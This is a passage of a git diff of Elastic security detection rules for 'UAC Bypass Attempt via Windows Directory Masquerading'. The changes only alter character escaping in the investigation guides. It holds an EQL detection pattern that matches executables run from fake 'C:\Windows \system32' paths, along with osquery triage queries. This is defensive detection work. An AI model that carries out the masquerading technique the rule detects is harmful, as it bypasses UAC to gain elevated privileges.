droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.args : (\"C:\\\\Windows \\\\system32\\\\*.exe\", \"C:\\\\Windows \\\\SysWOW64\\\\*.exe\")\n", "references": [ "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e" @@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "290aca65-e94d-403b-ba0f-62f320e63f51", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_107.json b/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_107.json index dfa95e1462d..87f01acda88 100644 --- a/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_107.json +++ b/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_107.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "UAC Bypass Attempt via Windows Directory Masquerading", - "note": "## Triage and analysis\n\n### Investigating UAC Bypass Attempt via Windows Directory Masquerading\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating UAC Bypass Attempt via Windows Directory Masquerading\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.args : (\"C:\\\\Windows \\\\system32\\\\*.exe\", \"C:\\\\Windows \\\\SysWOW64\\\\*.exe\")\n", "references": [ "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e" @@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "290aca65-e94d-403b-ba0f-62f320e63f51", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_108.json b/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_108.json index 1a354dfa135..b4f9e5f744a 100644 --- a/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_108.json +++ b/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_108.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "UAC Bypass Attempt via Windows Directory Masquerading", - "note": "## Triage and analysis\n\n### Investigating UAC Bypass Attempt via Windows Directory Masquerading\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating UAC Bypass Attempt via Windows Directory Masquerading\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.args : (\"C:\\\\Windows \\\\system32\\\\*.exe\", \"C:\\\\Windows \\\\SysWOW64\\\\*.exe\")\n", "references": [ "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e" @@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "290aca65-e94d-403b-ba0f-62f320e63f51", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_109.json b/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_109.json index 1b68f9222aa..6d33f3a2c35 100644 --- a/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_109.json +++ b/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_109.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "UAC Bypass Attempt via Windows Directory Masquerading", - "note": "## Triage and analysis\n\n### Investigating UAC Bypass Attempt via Windows Directory Masquerading\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating UAC Bypass Attempt via Windows Directory Masquerading\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.args : (\"C:\\\\Windows \\\\system32\\\\*.exe\", \"C:\\\\Windows \\\\SysWOW64\\\\*.exe\")\n", "references": [ "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e" @@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "290aca65-e94d-403b-ba0f-62f320e63f51", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 